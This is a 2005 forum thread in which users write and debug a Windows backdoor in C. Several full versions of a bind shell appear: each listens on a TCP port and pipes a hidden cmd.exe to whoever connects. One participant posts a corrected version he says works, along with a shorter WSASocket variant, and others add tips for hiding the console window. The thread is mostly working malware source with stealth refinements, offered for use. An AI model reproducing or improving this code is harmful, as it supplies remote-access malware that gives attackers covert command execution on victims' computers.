Writing A Backdoor For Windows Os

White Scorpion

Jan 30 2005, 09:47 PM

Hi all,

i'm trying to write a backdoor for windows in ASM.
so far i have a sourcefile of 8kb (lot of options).
one of the options (spawning a shell) is hard to get to work.

since most people do not know assembly but maybe they know C, i have written a testprogram in C which should spawn the shell. as soon as i have this program working like it should, i am able to finish writing my program.

here's the code in C i have so far:

CODE

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <windowsx.h>
#include <unistd.h>

#define PORT 34567
#define BUFSIZE 8000

int WINAPI WinMain (HINSTANCE hThisInstance,
HINSTANCE hPrevInstance,
LPSTR lpszArgument,
int nFunsterStil)

{
WSADATA wsadata;
SOCKET serversock,clientsock;
STARTUPINFO si;
PROCESS_INFORMATION pi;
HANDLE hRead,hWrite;
DWORD bytesRead,bytesWritten;
SECURITY_ATTRIBUTES secat;
int size;
char sendbuf[BUFSIZE];
char recvbuf[BUFSIZE];
char systemdir[200];
char Command[BUFSIZE+200];
const char *string1="Written by White Scorpion Security (C) 2004\n";
const char *string2="****** http://www.white-scorpion.nl *******\n\n";
const char Prompt[]="\nBackdoor:\\>";

ZeroMemory( &si, sizeof(si) );
si.cb = sizeof(si);
ZeroMemory( &pi, sizeof(pi) );

struct sockaddr_in server;
server.sin_family = AF_INET;
server.sin_addr.s_addr = INADDR_ANY;
server.sin_port = htons(PORT);
ZeroMemory(server.sin_zero,sizeof(server.sin_zero));

struct sockaddr_in client;
size=sizeof(client);

if(WSAStartup(MAKEWORD(2,0),&wsadata)!=0)
return EXIT_FAILURE;

if((serversock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
{
printf("error creating socket");
getch();
WSACleanup();
return EXIT_FAILURE;
}

if((bind(serversock,(struct sockaddr*)&server,sizeof(server)))==SOCKET_ERROR)
{
printf("Error binding socket");
getch();
WSACleanup();
return EXIT_FAILURE;
}

if((listen(serversock,5))==SOCKET_ERROR)
{
printf("error listening");
getch();
WSACleanup();
return EXIT_FAILURE;
}

secat.nLength=sizeof(secat);
secat.lpSecurityDescriptor=NULL;
secat.bInheritHandle=TRUE;

while(1)
{
if((clientsock=accept(serversock,(struct sockaddr*)&client,&size))==INVALID_SOCKET)
{
close(serversock);
WSACleanup();
return EXIT_FAILURE;
}
send(clientsock,string1,strlen(string1),0);
send(clientsock,string2,strlen(string2),0);
CreatePipe(&hRead,&hWrite,&secat,0);
GetStartupInfo(&si);
si.hStdError=hWrite;
si.hStdOutput=hWrite;
si.wShowWindow=SW_HIDE;
si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
CreateProcess(NULL,TEXT("cmd.exe"),NULL,NULL,TRUE,
NULL,NULL,NULL,&si,&pi);

while (TRUE)
{
if (ReadFile(hRead,sendbuf,sizeof(sendbuf),&bytesRead,NULL)==0)
break;
send(clientsock,sendbuf,bytesRead,0);
memset(sendbuf,0,sizeof (sendbuf));

}

}
}

if you compile and run this program it will listen to port 34567. when connected to the port it starts cmd.exe and redirects the output to the socket.

so far so good, but unfortunately this is about it.
the client will receive a command prompt, but when he enters his first command the program hangs in an infinite loop.

my problem is that i do not know how to get the command that is given to cmd.exe (process).

any ideas are highly appreciated

Kind regards,

x^r

Jan 30 2005, 10:31 PM

hi,

I think you need to create another pipe that handles 'hStdInput'

then, recv() the the 'cmds' from sock and WriteFile() them into new pipe.

Hopes this helped you a bit

Greetz x^r

White Scorpion

Jan 31 2005, 06:44 AM

i see what you mean, now i have the following:

CODE

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <windowsx.h>
#include <unistd.h>

#define PORT 34567
#define BUFSIZE 8000

int WINAPI WinMain (HINSTANCE hThisInstance,
HINSTANCE hPrevInstance,
LPSTR lpszArgument,
int nFunsterStil)

{
WSADATA wsadata;
SOCKET serversock,clientsock;
STARTUPINFO si;
PROCESS_INFORMATION pi;
HANDLE hRead,hWrite,hRead2,hWrite2;
DWORD bytesRead,bytesWritten;
SECURITY_ATTRIBUTES secat;
int size;
char sendbuf[BUFSIZE];
char recvbuf[BUFSIZE];
char systemdir[200];
char Command[BUFSIZE+200];
const char *string1="Written by White Scorpion Security (C) 2004\n";
const char *string2="****** http://www.white-scorpion.nl *******\n\n";
const char Prompt[]="\nBackdoor:\\>";

ZeroMemory( &si, sizeof(si) );
si.cb = sizeof(si);
ZeroMemory( &pi, sizeof(pi) );

struct sockaddr_in server;
server.sin_family = AF_INET;
server.sin_addr.s_addr = INADDR_ANY;
server.sin_port = htons(PORT);
ZeroMemory(server.sin_zero,sizeof(server.sin_zero));

struct sockaddr_in client;
size=sizeof(client);

if(WSAStartup(MAKEWORD(2,0),&wsadata)!=0)
return EXIT_FAILURE;

if((serversock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
{
printf("error creating socket");
getch();
WSACleanup();
return EXIT_FAILURE;
}

if((bind(serversock,(struct sockaddr*)&server,sizeof(server)))==SOCKET_ERROR)
{
printf("Error binding socket");
getch();
WSACleanup();
return EXIT_FAILURE;
}

if((listen(serversock,5))==SOCKET_ERROR)
{
printf("error listening");
getch();
WSACleanup();
return EXIT_FAILURE;
}

secat.nLength=sizeof(secat);
secat.lpSecurityDescriptor=NULL;
secat.bInheritHandle=TRUE;

while(1)
{
if((clientsock=accept(serversock,(struct sockaddr*)&client,&size))==INVALID_SOCKET)
{
close(serversock);
WSACleanup();
return EXIT_FAILURE;
}
send(clientsock,string1,strlen(string1),0);
send(clientsock,string2,strlen(string2),0);
CreatePipe(&hRead,&hWrite,&secat,0);
CreatePipe(hRead2,&hWrite2,&secat,0);
GetStartupInfo(&si);
si.hStdError=hWrite;
si.hStdOutput=hWrite;
si.wShowWindow=SW_HIDE;
si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;

CreateProcess(NULL,TEXT("cmd.exe"),NULL,NULL,TRUE,
DETACHED_PROCESS,NULL,NULL,&si,&pi);

while (TRUE)
{
if(ReadFile(hRead,sendbuf,sizeof(sendbuf),&bytesRead,NULL)==0)
break;
send(clientsock,sendbuf,bytesRead,0);
memset(sendbuf,0,sizeof (sendbuf));
recv(clientsock,recvbuf,bytesWritten,0);
if(WriteFile(hWrite2,recvbuf,sizeof(recvbuf),&bytesWritten,NULL)==0)
break;
memset(recvbuf,0,sizeof(sendbuf));
}

}
}

something goes wrong with this code since the app crashes after connection....

x^r

Jan 31 2005, 10:42 AM

change : CreatePipe(hRead2,&hWrite2,&secat,0);
to : CreatePipe(&hRead2,&hWrite2,&secat,0);
and add : si.hStdInput = hRead2;

that should make that pipe work

Goodluck !

Greetz x^r

White Scorpion

Jan 31 2005, 08:52 PM

well,

i think the pipe works, but the program itself still doesn't work...

how can i use the pipe to send the data to the cmd.exe?

here's the code that i have so far:

CODE

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <windowsx.h>
#include <unistd.h>

#define PORT 12345
#define BUFSIZE 8000

int WINAPI WinMain (HINSTANCE hThisInstance,
HINSTANCE hPrevInstance,
LPSTR lpszArgument,
int nFunsterStil)

{
WSADATA wsadata;
SOCKET serversock,clientsock;
STARTUPINFO si;
PROCESS_INFORMATION pi;
HANDLE hRead,hWrite,hRead2,hWrite2;
DWORD bytesRead,bytesWritten;
SECURITY_ATTRIBUTES secat;
int size;
char sendbuf[BUFSIZE];
char recvbuf[BUFSIZE];
char systemdir[200];
char Command[BUFSIZE+200];
const char *string1="Written by White Scorpion Security (C) 2004\n";
const char *string2="****** http://www.white-scorpion.nl *******\n\n";

ZeroMemory( &si, sizeof(si) );
si.cb = sizeof(si);
ZeroMemory( &pi, sizeof(pi) );

struct sockaddr_in server;
server.sin_family = AF_INET;
server.sin_addr.s_addr = INADDR_ANY;
server.sin_port = htons(PORT);
ZeroMemory(server.sin_zero,sizeof(server.sin_zero));

struct sockaddr_in client;
size=sizeof(client);

if(WSAStartup(MAKEWORD(2,0),&wsadata)!=0)
return EXIT_FAILURE;

if((serversock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
{
printf("error creating socket");
getch();
WSACleanup();
return EXIT_FAILURE;
}

if((bind(serversock,(struct sockaddr*)&server,sizeof(server)))==SOCKET_ERROR)
{
printf("Error binding socket");
getch();
WSACleanup();
return EXIT_FAILURE;
}

if((listen(serversock,5))==SOCKET_ERROR)
{
printf("error listening");
getch();
WSACleanup();
return EXIT_FAILURE;
}

secat.nLength=sizeof(secat);
secat.lpSecurityDescriptor=NULL;
secat.bInheritHandle=TRUE;

while(1)
{
if((clientsock=accept(serversock,(struct sockaddr*)&client,&size))==INVALID_SOCKET)
{
close(serversock);
WSACleanup();
return EXIT_FAILURE;
}
send(clientsock,string1,strlen(string1),0);
send(clientsock,string2,strlen(string2),0);
CreatePipe(&hRead,&hWrite,&secat,0);
CreatePipe(&hRead2,&hWrite2,&secat,0);
GetStartupInfo(&si);
si.hStdError=hWrite;
si.hStdOutput=hWrite;
si.hStdInput=hRead2;
si.wShowWindow=SW_HIDE;
si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;

CreateProcess(NULL,TEXT("cmd.exe"),NULL,NULL,TRUE,
DETACHED_PROCESS,NULL,NULL,&si,&pi);
while(1)
{
while (TRUE)
{
memset(sendbuf,0,sizeof (sendbuf));
if(ReadFile(hRead,sendbuf,BUFSIZE,&bytesRead,NULL)==0)
break;
send(clientsock,sendbuf,strlen(sendbuf),0);
}

recv(clientsock,recvbuf,strlen(recvbuf),0);
if(WriteFile(hWrite2,recvbuf,BUFSIZE,&bytesWritten,NULL)==0)
break;
memset(recvbuf,0,sizeof(sendbuf));

}
}
}

thanks for your help btw

x^r

Jan 31 2005, 10:26 PM

hi, edited it a bit to make it work...

CODE

#pragma comment(lib, "ws2_32.lib")

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
//#include <windowsx.h>
//#include <unistd.h>

#define PORT 12345
#define BUFSIZE 8000

int WINAPI WinMain (HINSTANCE hThisInstance,
HINSTANCE hPrevInstance,
LPSTR lpszArgument,
int nFunsterStil)

{
WSADATA wsadata;
SOCKET serversock,clientsock;
STARTUPINFO si;
PROCESS_INFORMATION pi;
HANDLE hRead,hWrite,hRead2,hWrite2;
DWORD bytesRead;
SECURITY_ATTRIBUTES secat;
int size;
char sendbuf[BUFSIZE];
const char *string1="Written by White Scorpion Security (C) 2004\n";
const char *string2="****** http://www.white-scorpion.nl *******\n\n";
struct timeval tv_r;
fd_set rfds;

ZeroMemory( &si, sizeof(si) );
si.cb = sizeof(si);
ZeroMemory( &pi, sizeof(pi) );

struct sockaddr_in server;
server.sin_family = AF_INET;
server.sin_addr.s_addr = INADDR_ANY;
server.sin_port = htons(PORT);
ZeroMemory(server.sin_zero,sizeof(server.sin_zero));

struct sockaddr_in client;
size=sizeof(client);

if(WSAStartup(MAKEWORD(2,0),&wsadata)!=0)
return EXIT_FAILURE;

if((serversock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
{
printf("error creating socket");
// getch();
WSACleanup();
return EXIT_FAILURE;
}

if((bind(serversock,(struct sockaddr*)&server,sizeof(server)))==SOCKET_ERROR)
{
printf("Error binding socket");
// getch();
WSACleanup();
return EXIT_FAILURE;
}

if((listen(serversock,5))==SOCKET_ERROR)
{
printf("error listening");
// getch();
WSACleanup();
return EXIT_FAILURE;
}

secat.nLength=sizeof(secat);
secat.lpSecurityDescriptor=NULL;
secat.bInheritHandle=TRUE;

tv_r.tv_sec = 0;
tv_r.tv_usec = 500;
while(1)
{
if((clientsock=accept(serversock,(struct sockaddr*)&client,&size))==INVALID_SOCKET)
{
closesocket(serversock);
WSACleanup();
return EXIT_FAILURE;
}
send(clientsock,string1,strlen(string1),0);
send(clientsock,string2,strlen(string2),0);
if(!CreatePipe(&hRead,&hWrite,&secat,0))
return EXIT_FAILURE;
if(!CreatePipe(&hRead2,&hWrite2,&secat,0))
return EXIT_FAILURE;
ZeroMemory(&si,sizeof(si));
si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
si.hStdInput = hRead2;
si.hStdOutput = si.hStdError = hWrite;
if(!CreateProcess(NULL,"cmd.exe",NULL,NULL,1,0,NULL,NULL,&si,&pi))
return EXIT_FAILURE;

while(1)
{
memset(sendbuf,0,sizeof(sendbuf));
Sleep(100);
PeekNamedPipe(hRead,sendbuf,sizeof(sendbuf),&bytesRead,0,0);
if(bytesRead)
{
if(!ReadFile(hRead, sendbuf, bytesRead, &bytesRead, 0))
return EXIT_FAILURE;
if(!send(clientsock, sendbuf, bytesRead, 0))
break;
}
else
{
FD_ZERO(&rfds);
FD_SET(clientsock, &rfds);
if ( select(FD_SETSIZE, &rfds, NULL, NULL, &tv_r) < 0)
return EXIT_FAILURE;
if (FD_ISSET(clientsock, &rfds))
{
if( (bytesRead=recv(clientsock, sendbuf, sizeof(sendbuf), 0)) < 1)
break;
if ( strnicmp( sendbuf, "exit", 4) == 0 )
break;
if(!WriteFile(hWrite2, sendbuf, bytesRead, &bytesRead, 0))
return EXIT_FAILURE;
}
}
}
TerminateProcess(pi.hProcess, 1);
CloseHandle(hWrite2);
CloseHandle(hRead);
CloseHandle(hRead2);
CloseHandle(hWrite);
closesocket(clientsock);
}
}

Greetz x^r

x^r

Jan 31 2005, 11:01 PM

you might also wanne use 'WSASocket()' in your code wich eliminates the use of pipes..

WSASocket() retuns sockets that can be used as an 'HANDLE'

CODE

// cl /nologo /W3 /MD test.c

#pragma comment (lib,"ws2_32")

#include <winsock2.h>
#include <windows.h>
#include <stdio.h>

int main()
{
WSADATA wsd;
SOCKET s1,s2;
struct sockaddr_in sockadd;
int len=sizeof(sockadd);
STARTUPINFO SI;
PROCESS_INFORMATION PI;

sockadd.sin_family=AF_INET;
sockadd.sin_port=htons(31337);
sockadd.sin_addr.s_addr=htonl(INADDR_ANY);
WSAStartup(MAKEWORD(2,2),&wsd);
s1=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0);
bind(s1,(struct sockaddr *)&sockadd,len);
listen(s1,5);
while(1)
{
s2=accept(s1,(struct sockaddr *)&sockadd,&len);
ZeroMemory(&SI,sizeof(SI));
ZeroMemory(&PI,sizeof(PI));
SI.cb = sizeof(SI);
SI.dwFlags=STARTF_USESTDHANDLES;
SI.hStdError=(HANDLE)s2;
SI.hStdInput=(HANDLE)s2;
SI.hStdOutput=(HANDLE)s2;
CreateProcess(NULL,"cmd",NULL,NULL,1,0,NULL,NULL,&SI,&PI);
WaitForSingleObject(PI.hProcess,INFINITE);
closesocket(s2);
}
return 0;
}

No error checking in this code tho :))

Greetz x^r

White Scorpion

Feb 1 2005, 11:58 AM

well, you'r making it a bit complicated like this...

the first one (edited one) you have added several structures which i do not understand yet...
it compiles fine, but it will not keep running, so it is not listening like it should.

the other one is more like my way of coding (not too complicated), but i can not compile it. which compiler are you using?

if i use dev-cpp i get the error:

QUOTE

undefined reference to 'WSASocketA@24'

i've added the normal parameter to the linker (libwsock32.a). this parameter normally is sufficient for winsock API's, but appearently not when using WSASocket.

i've tried googling for WSASocket, and all you seem to need is

CODE

#include <winsock2.h>

however, this doesn't work for me

i've tried figuring out the pipes some more, since i might be able to use them with local input and if i manage to do that, then the link to the socket is pretty easy

Kind regards,

and congratz with your membership btw

x^r

Feb 1 2005, 02:34 PM

QUOTE

the first one (edited one) you have added several structures which i do not understand yet...
it compiles fine, but it will not keep running, so it is not listening like it should.

I only added a timout on the recv() from socket else it will wait forever,
while the cmd.exe might have output waiting...

here it stays running and is listening like it should..

I use Microsoft Visual Studio 6.0 to compile

Greetz x^r

B3T4

Feb 1 2005, 03:39 PM

[in reply to x^r's code]

to fix the problem do :: Project -> Settings -> Link -> Catagory Output -> and fill in as Entr-point-symbol : mainCRTStartup

its should compile fine now

althou i must say the program is in-perfect. It shows a flash of a consolewindow on connection and no output is given.

the console flash thou is easily solved by changing :

CODE

SI.dwFlags=STARTF_USESTDHANDLES;

to

CODE

SI.dwFlags = STARTF_USESHOWWINDOW;
SI.wShowWindow = SW_HIDE;

to fix the input output thing i dont quite know. I ported the code to Delphi and it all goes smooth except one thing, the shell is spawned inside the window i run it in

:edit: ow, i found out it was because of the change with usesstadhandles and usesshowwindow...

White Scorpion

Feb 1 2005, 06:00 PM

Hi,

well, i've tried with USESHOWWINDOW and with stdhandles, well with stdhandles nothing happens when you connect, and with the following code:

CODE

// cl /nologo /W3 /MD test.c

#pragma comment (lib,"ws2_32")

#include <winsock2.h>
#include <windows.h>
#include <stdio.h>

int main()
{
WSADATA wsd;
SOCKET s1,s2;
struct sockaddr_in sockadd;
int len=sizeof(sockadd);
STARTUPINFO SI;
PROCESS_INFORMATION PI;

sockadd.sin_family=AF_INET;
sockadd.sin_port=htons(31337);
sockadd.sin_addr.s_addr=htonl(INADDR_ANY);
WSAStartup(MAKEWORD(2,2),&wsd);
s1=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0);
bind(s1,(struct sockaddr *)&sockadd,len);
listen(s1,5);
while(1)
{
s2=accept(s1,(struct sockaddr *)&sockadd,&len);
ZeroMemory(&SI,sizeof(SI));
ZeroMemory(&PI,sizeof(PI));
SI.cb = sizeof(SI);
SI.dwFlags = STARTF_USESTDHANDLES;
SI.wShowWindow = SW_HIDE;
SI.hStdError=(HANDLE)s2;
SI.hStdInput=(HANDLE)s2;
SI.hStdOutput=(HANDLE)s2;
CreateProcess(NULL,"cmd",NULL,NULL,1,0,NULL,NULL,&SI,&PI);
WaitForSingleObject(PI.hProcess,INFINITE);
closesocket(s2);
}
return 0;
}

you get an endless loop of spawning CMD.exe processes... i'm glad i had a program in handy which killed all the cmd.exe when i told it to, otherwise i might had to reboot my complete computer to get it to work again

thank god i have a couple of hours spare time tonight, so i will try to figure out how the pipes work without using sockets. if i can manage to get that to work, then i think it won't be a problem getting the sockets involved as well...

passi

Feb 3 2005, 10:06 AM

Sounds like you want the same shell option like NetCat already has. So why not check the code of NetCat? There you'll find the answer

I attached ver 1.11NT - good luck!

Btw: You only need the doexec.c

White Scorpion

Feb 3 2005, 08:49 PM

thanks for the idea, but unfortunately i already done that (it was the first thing i did several months ago when i first started with it).

i can't really get enough info out it, it is a bit too complicated / long